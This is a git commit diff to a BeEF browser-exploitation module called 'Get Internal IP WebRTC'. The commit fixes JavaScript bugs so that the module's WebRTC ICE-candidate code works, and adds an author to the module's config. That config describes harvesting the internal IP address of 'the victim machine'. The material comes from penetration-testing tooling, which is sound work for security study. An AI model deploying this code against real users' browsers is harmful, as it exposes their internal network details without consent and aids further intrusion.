Fixed a few JS errors preventing the module from running. Tested on Edge 40 (Win10) and Chrome 58 (OSX)
This commit is contained in:
@@ -21,12 +21,11 @@ beef.execute(function() {
|
|||||||
"iceServers": [ ],
|
"iceServers": [ ],
|
||||||
});
|
});
|
||||||
iceGatherer.onlocalcandidate = function (evt) {
|
iceGatherer.onlocalcandidate = function (evt) {
|
||||||
if (oEvent.candidate.type) {
|
if (evt.candidate.type) {
|
||||||
// There may be multiple IP addresses
|
// There may be multiple IP addresses
|
||||||
beef.debug(JSON.Stringify(evt.candidate));
|
|
||||||
if (evt.candidate.type == "host") {
|
if (evt.candidate.type == "host") {
|
||||||
// The ones marked "host" are local IP addresses
|
// The ones marked "host" are local IP addresses
|
||||||
processIPs(oEvent.candidate.ip);
|
processIPs(evt.candidate.ip);
|
||||||
};
|
};
|
||||||
} else {
|
} else {
|
||||||
retResults();
|
retResults();
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ beef:
|
|||||||
category: "Host"
|
category: "Host"
|
||||||
name: "Get Internal IP WebRTC"
|
name: "Get Internal IP WebRTC"
|
||||||
description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from <a href='http://net.ipcalf.com/' target='_blank'>http://net.ipcalf.com/</a>"
|
description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from <a href='http://net.ipcalf.com/' target='_blank'>http://net.ipcalf.com/</a>"
|
||||||
authors: ["xntrik", "@natevw"]
|
authors: ["skylined", "xntrik", "@natevw"]
|
||||||
target:
|
target:
|
||||||
working: ["C", "FF"]
|
working: ["C", "FF"]
|
||||||
not_working: ["ALL"]
|
not_working: ["ALL"]
|
||||||
|
|||||||
Reference in New Issue
Block a user